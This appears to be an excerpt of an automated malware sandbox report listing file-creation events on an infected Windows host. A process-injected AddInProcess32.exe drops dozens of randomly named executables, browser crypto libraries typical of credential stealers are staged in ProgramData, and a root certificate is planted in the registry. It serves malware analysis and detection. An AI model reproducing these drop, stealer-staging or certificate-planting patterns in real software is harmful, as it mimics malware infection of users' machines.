                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\NpXiURSjfclxWgcUlkMD5eJ8.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\GyEiPhmZ7wFSCYXwTgsPkluJ.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\PuQVr13ObJzLxhvCkSK1EXB6.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\IsEPzSszgrCYUPQvHPDrLyFU.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\Zsk2cFkeBC4UsceqkHvvw1iU.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\PurfH4hAOpbVHLEkly68a3iu.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\s2mORnBj3q8nWakBtFzD2977.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\62dRoO3BlNtGMcLNCSYzZeqJ.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | File created: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\bw9CU3SIyrt3JEs5ELMi3GM3.exe
                        Source: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe | File created: C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\JUnCNhn.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\Yu3aePJPmCD2ksmvI16UpN6t.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\Retailer_prog[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\NDdJEWHR1zXBL7ACRBN1bJsT.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\i5XdJ65IHwp8ssJDgSUt738t.exe
                        Source: C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe | File created: C:\Users\user\AppData\Local\Temp\u2r8.1.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\Or8Lkccj3KUYl1SEoAAXBR7t.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\CzCAVDbVcAMwrBna8hMGEVEa.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\rCkxIY3aeSpXebK5FfkxePC4.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\jl7RUebEK9s2GdCw2naZuXH3.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\KgnOTzWY3o0raijub6ZAid5Z.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\WMW9Xl8E0Ffe1Nak8GbEfdwd.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\hK1ls0Ofsd3l9PBQOnBvFrY4.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\FcF2JyfJLWaSsoJShTukNm1O.exe
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232137541\opera_package
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\Xd5tydDy6Vge5DSIUsA4B8HM.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\y1mf9KikiO68brzuQYIFxwgi.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\3CfyWUQfEPMLfwgMw9RKzj9q.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\wAyxI7uUktpH5TtM4zqnMftR.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\V4R2L1ofXzAhB4UFI0Rj2LED.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\msvcp140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\LuXFYkxCqJv6U5aGsy6shXnX.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\setup[1].exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\vcruntime140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\0DWhHyQpdxsJp4gA1M0WjqnA.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\PurfH4hAOpbVHLEkly68a3iu.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\OFQ7ZJkbPO93pwjUuJw87q34.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\Space_my[1].exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\HDCJLf7pYcxae1KSycA6A5eR.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\123p[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\sJ72s0PpaBNUmYNiHyJZFP9z.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\75ML2QNSkdxIefrPkvr0UjCi.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\WjXPtwNxqwEpWrekfMAFvnPV.exe
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | File created: C:\Users\user\AppData\Local\Temp\u1hw.1.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\H9xPrDydeyqRWbh69y5tSjbf.exe
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | File created: C:\Users\user\AppData\Local\Temp\u5v8.1.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\PuQVr13ObJzLxhvCkSK1EXB6.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\TZNY2jGrHaeFElorDDQMNtS0.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File created: C:\ProgramData\vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\eRAYqRRIfUj5yD0ovEh9HMd4.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\f1yTeHrlUuYsPLKRUrl6KMpe.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\I7GsKiDVRkgU0AqHrZJ1PiD5.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\7725eaa6592c80f8124e769b4e8a07f7[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\9rAJjYr1uJZPfASZhYrXXHW2.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\y6XaweA6d3ukZLoFeklnZ9Wr.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\uhjAlwetTCGgkw8uV562JOyG.exe
                        Source: C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe | File created: C:\Users\user\AppData\Local\Temp\u33c.0.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\8FauF1Ec16N4pbn45vApMB9Y.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\x3HF5f4W7zVGUR0m1DVxQqdq.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\vg2jjUpoYoMsgaKeZN28z4wt.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\sVP78YSUuB86fyhUIuxT6msl.exe
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | File created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\hh.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\nUulTm4TlMq3112NFdqwQUUv.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\5vt9Hlt4sHU3M9tLNtkwRemY.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\s2mORnBj3q8nWakBtFzD2977.exe
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2404231937415374172.dll
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File created: C:\ProgramData\mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | File created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\mozglue[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\ra8RK0HZwqsQsFKuKAOljczn.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\0Bos1rjatCgxKDAqeI5gMROw.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\ehuKK8NkGWXoqtsyMQJdZvL3.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\r1G18V8V8shEwNWwtcDq5rcn.exe
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | File created: C:\Users\user\AppData\Local\Temp\u4dc.0.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\tw6SuwCix1CRVfIYPT24Ycm6.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\SZ0cEDCrvP4evlvcOCUltmHu.exe
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232138021\opera_package
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File created: C:\ProgramData\freebl3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\rSpYcYxqkOCX3T18aW46DWhn.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\z443T0kZxO5VAxRMw1cjpQdZ.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\IiFh1rXOMpGB7BnxmUig3wkQ.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\xvXQt3HWUPHZOypqdys3bcAm.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe | File created: C:\Users\user\AppData\Local\Temp\u1hw.0.exe
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | File created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\9UmuglKcKHgfePSzDJeh2tr3.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\freebl3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\jZXBdg5rull5j6LgJCWVgVos.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\bfxtyeVJT5bBfIUy0v6XVgPU.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\fkwQUocr72Hw75SyPBzpetnQ.exe
                        Source: C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe | File created: C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\vU4jsQbpuBQoMcavMx7b1jzX.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\JMNwDYLRHcfb7Lck3bh1QS4f.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\01ySZukOlUcP5NF6FSceJyuX.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\QFdxqcJJKBnNvVH34NTBZO9k.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\62dRoO3BlNtGMcLNCSYzZeqJ.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\4H9gwSn9hsmr1uT7Ln1OMxxi.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Default12_my[1].exe
                        Source: C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe | File created: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\rdJ9fWEopei9Jq2a4C4fmX3Z.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\p9kj7yqazy7x5QKCpeuskKjf.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\9SfnYxeY7MBStUWc3d6vaufA.exe
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[2].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\F9a5CAWDzjn4KX6pZMk93eNG.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\tSUKH8w2Pv8sgaLWrFPRDr1i.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\XqzL1fMvCxCCFKp0SSzKRmTk.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\gs73fZcRyFDJYoYkZbrtadCy.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\pHBfSuis1Xhkv6ZdHJOyObLb.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\zfeRg1KL3b6mzyGkHfaolHvL.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\tByrAP8ibeDbCSADnquqVBQi.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\2pjOwxxUjFNOdrkI94TdGraH.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\BCSbmKJiX30BH99M4SeS6WhT.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\0bDSNbGYZjXnI1v06off3DYe.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\MLHy8CHCXXPjzOh2OJFrG13g.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\4atMces8tYoo96OnbLT8HE6O.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\qGkRm1tZi3ZgbNWlurynDnJq.exe
                        Source: C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe | File created: C:\Users\user\AppData\Local\Temp\Opera_installer_2404231937382151588.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\Pb9nMKWmPyxCQFZJxeJuCUeo.exe
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Opera_109.0.5097.59_Autoupdate_x64[4].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\s2d02ZEHUbxI410yPzvUYGTP.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\XE6DyfdivLtuouzog1ddAcWy.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\SsTCNrfNwbE2RJWH23gTlxFP.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\ult4yIpyxeTm9lUFFOHFNl2P.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nss3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\lOl0Z8MedrKL384KSuZP1lEu.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\snOfq5H0Ss3VGXsE0fRFljun.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\Fh7qhqxo9lqcq8fZJGpCZFiC.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File created: C:\ProgramData\nss3.dll
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\060[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\VKzps0C0te7NTLkv4QCHU1YW.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\hKiTsf257VLWDEryVqhdGiax.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\GyEiPhmZ7wFSCYXwTgsPkluJ.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\nMCfbx6hx0DUWGYJuDAMUAIJ.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\cad54ba5b01423b1af8ec10ab5719d97[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\vMRsi4avLKS3BjZRk9vaqhZz.exe
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe | File created: C:\Users\user\AppData\Local\Temp\u4dc.1.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\7ajn4zo6v0GdgVSDv67pQ6UA.exe
                        Source: C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe | File created: C:\Users\user\AppData\Local\Temp\u46g.0.exe
                        Source: C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe | File created: C:\Users\user\AppData\Local\Temp\u4hg.0.exe
                        Source: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe | File created: C:\Users\user\Documents\SimpleAdobe\urA10ZckYEEXLZZov5c00RO_.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\PNqnjNHui8frV2dffCZrA05K.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\SlHGsDZGgkpk7MxF0QDuypot.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\Pictures\RHyh0hfeaEHqborlFdL4LJTH.exe
                        Source: C:\Users\user\AppData\Local\Temp\u5v8.0.exe | File created: C:\ProgramData\msvcp140.dll
                        Source: C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe | File created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\nxx62MIcAq1mLUazdUlt2emv.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exe
                        Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe | File created: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\wkp6W1E2mbyM9VriyJKcQkLy.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File created: C:\Users\user\AppData\Local\mPkGObww76qlp1C09a4tgBES.exe
